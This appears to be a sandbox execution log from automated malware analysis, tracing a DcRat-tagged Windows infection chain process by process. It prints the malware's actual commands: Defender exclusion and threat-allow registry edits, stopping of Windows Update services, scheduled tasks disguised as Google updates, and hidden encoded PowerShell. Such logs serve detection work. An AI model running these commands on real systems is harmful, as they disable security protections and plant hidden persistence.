C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4CED.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4E74.tmp\Install.exe.\Install.exe /MKdidA "385119" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBWIJtiSe" /SC once /ST 04:01:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBWIJtiSe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBWIJtiSe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 23:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe\" 3Y /tIsite_idILE 385119 /S" /V1 /F6⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-7OJRC.tmp\is-OVUC4.tmp"C:\Users\Admin\AppData\Local\Temp\is-7OJRC.tmp\is-OVUC4.tmp" /SL4 $F030A "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522245⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\4822.exeC:\Users\Admin\AppData\Local\Temp\4822.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\515A.exeC:\Users\Admin\AppData\Local\Temp\515A.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 7603⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\8D0D.exeC:\Users\Admin\AppData\Local\Temp\8D0D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 3884⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\AB44.exeC:\Users\Admin\AppData\Local\Temp\AB44.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\tJYzbog.exe 3Y /tIsite_idILE 385119 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
